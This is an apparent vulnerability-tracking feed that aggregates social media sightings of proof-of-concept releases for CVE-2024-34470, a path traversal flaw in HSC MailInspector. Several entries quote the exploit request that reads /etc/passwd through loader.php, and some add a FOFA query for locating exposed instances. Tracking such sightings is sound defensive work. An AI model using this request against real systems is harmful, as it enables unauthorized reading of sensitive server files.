<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://db.gcve.eu/sightings/feed</id>
  <title>Most recent sightings.</title>
  <updated>2026-05-02T22:08:32.355544+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>info@gcve.eu</email>
  </author>
  <link href="https://db.gcve.eu" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent sightings.</subtitle>
  <entry>
    <id>https://db.gcve.eu/sighting/cf1d4706-a0fb-4125-87c5-e4977c41c1d6/export</id>
    <title>cf1d4706-a0fb-4125-87c5-e4977c41c1d6</title>
    <updated>2026-05-02T22:08:32.789022+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "cf1d4706-a0fb-4125-87c5-e4977c41c1d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7710", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC and bulk scanner for CVE-2024-34470\nURL\uff1ahttps://github.com/bigb0x/CVE-2024-34470\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-19T11:36:16.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/cf1d4706-a0fb-4125-87c5-e4977c41c1d6/export"/>
    <published>2024-06-19T11:36:16+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/c96d724a-1fe9-49ea-b1b0-4e33bc6d539d/export</id>
    <title>c96d724a-1fe9-49ea-b1b0-4e33bc6d539d</title>
    <updated>2026-05-02T22:08:32.788972+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "c96d724a-1fe9-49ea-b1b0-4e33bc6d539d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2685", "content": "CVE-2024-34470\n\nGET   /mailinspector/public/loader.php?path=../../../../../../../etc/passwd\n\n#exploit #poc", "creation_timestamp": "2024-06-19T15:42:16.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/c96d724a-1fe9-49ea-b1b0-4e33bc6d539d/export"/>
    <published>2024-06-19T15:42:16+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/cdd93784-fcf4-4f16-b464-f2526452c585/export</id>
    <title>cdd93784-fcf4-4f16-b464-f2526452c585</title>
    <updated>2026-05-02T22:08:32.788924+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "cdd93784-fcf4-4f16-b464-f2526452c585", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "Telegram/yPYr0DasaZkkHrbr-hd2EaUFfatAxAgNbVitVrHRDWk2cg", "content": "", "creation_timestamp": "2024-06-19T16:43:11.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/cdd93784-fcf4-4f16-b464-f2526452c585/export"/>
    <published>2024-06-19T16:43:11+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/8442cfb4-aa91-421f-aaf7-6b5a6cfce133/export</id>
    <title>8442cfb4-aa91-421f-aaf7-6b5a6cfce133</title>
    <updated>2026-05-02T22:08:32.788872+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "8442cfb4-aa91-421f-aaf7-6b5a6cfce133", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/darkcommunityofficial/1030", "content": "CVE-2024-34470 HSC MailInspector\n*\nPOC:\nGET   /mailinspector/public/loader.php?path=../../../../../../../etc/passwd\n\nFOFA:\ntitle==\"..:: HSC MailInspector ::..\"", "creation_timestamp": "2024-06-20T01:17:39.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/8442cfb4-aa91-421f-aaf7-6b5a6cfce133/export"/>
    <published>2024-06-20T01:17:39+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/5b419d66-2075-4fe6-b84e-d77067b58459/export</id>
    <title>5b419d66-2075-4fe6-b84e-d77067b58459</title>
    <updated>2026-05-02T22:08:32.788813+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "5b419d66-2075-4fe6-b84e-d77067b58459", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/1194", "content": "\ud83d\udea8POC RELEASED\ud83d\udea8CVE-2024-34470 \"A critical vulnerability has been found in HSC Mailinspector up to version 5.2.18. This vulnerability affects an unknown functionality of the file /public/loader.php. Manipulating the 'path' argument with an unknown input leads to a path traversal vulnerability. According to CWE, this issue is classified as CWE-22.\n\nThe product uses external input to construct a pathname intended to identify a file or directory located beneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location outside of the restricted directory. This affects confidentiality, integrity, and availability.\"\n\nhttps://x.com/DarkWebInformer/status/1803905811229352212", "creation_timestamp": "2024-06-20T23:41:59.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/5b419d66-2075-4fe6-b84e-d77067b58459/export"/>
    <published>2024-06-20T23:41:59+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/05a11c0c-44c7-4f0e-a982-1b2eeb1c4d9b/export</id>
    <title>05a11c0c-44c7-4f0e-a982-1b2eeb1c4d9b</title>
    <updated>2026-05-02T22:08:32.788759+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "05a11c0c-44c7-4f0e-a982-1b2eeb1c4d9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/1196", "content": "https://github.com/Mr-r00t11/CVE-2024-34470", "creation_timestamp": "2024-06-20T23:43:07.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/05a11c0c-44c7-4f0e-a982-1b2eeb1c4d9b/export"/>
    <published>2024-06-20T23:43:07+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/ebece8c6-043f-435c-a47c-f30e724d9782/export</id>
    <title>ebece8c6-043f-435c-a47c-f30e724d9782</title>
    <updated>2026-05-02T22:08:32.788707+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "ebece8c6-043f-435c-a47c-f30e724d9782", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7746", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-34470 : An Unauthenticated Path Traversal Vulnerability in HSC Mailinspector\nURL\uff1ahttps://github.com/th3gokul/CVE-2024-34470\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-23T03:22:40.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/ebece8c6-043f-435c-a47c-f30e724d9782/export"/>
    <published>2024-06-23T03:22:40+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/7a4ef464-d217-4d5a-bbe7-cf9ccf302461/export</id>
    <title>7a4ef464-d217-4d5a-bbe7-cf9ccf302461</title>
    <updated>2026-05-02T22:08:32.788650+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "7a4ef464-d217-4d5a-bbe7-cf9ccf302461", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "Telegram/QibJsYL0eBhpoxhmaVTLg5u9toELdHUjfLp1DtbVaDJ7_HE", "content": "", "creation_timestamp": "2024-07-05T07:14:04.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/7a4ef464-d217-4d5a-bbe7-cf9ccf302461/export"/>
    <published>2024-07-05T07:14:04+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/c988c176-d015-4ace-bede-767eeba9c217/export</id>
    <title>c988c176-d015-4ace-bede-767eeba9c217</title>
    <updated>2026-05-02T22:08:32.788567+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "c988c176-d015-4ace-bede-767eeba9c217", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "published-proof-of-concept", "source": "https://t.me/CipherAgents/1306877", "content": "CVE-2024-34470 HSC MailInspector\n\nPOC:\nGET   /mailinspector/public/loader.php?path=../../../../../../../etc/passwd\n\nFOFA:\ntitle==\"..:: HSC MailInspector ::..\"\n\n#\ud835\ude4f\ud835\ude40\ud835\ude3c\ud835\ude48_\ud835\ude41\ud835\ude4e\ud835\ude40\ud835\ude3e #\ud835\ude4f\ud835\ude40\ud835\ude3c\ud835\ude48_\ud835\ude44\ud835\ude49\ud835\ude3f", "creation_timestamp": "2024-07-05T07:47:22.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/c988c176-d015-4ace-bede-767eeba9c217/export"/>
    <published>2024-07-05T07:47:22+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/57473150-9ec6-4055-91ec-c9269e871106/export</id>
    <title>57473150-9ec6-4055-91ec-c9269e871106</title>
    <updated>2026-05-02T22:08:32.786849+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>http://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "57473150-9ec6-4055-91ec-c9269e871106", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34470", "type": "seen", "source": "https://t.me/TheDarkWebInformer/17205", "content": "CVE-2024-34470: Path Traversal vulnerability in HSC Mailinspector\n\nCredit: youtube.com/@brutsecurity/", "creation_timestamp": "2025-05-13T19:03:06.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/57473150-9ec6-4055-91ec-c9269e871106/export"/>
    <published>2025-05-13T19:03:06+00:00</published>
  </entry>
</feed>
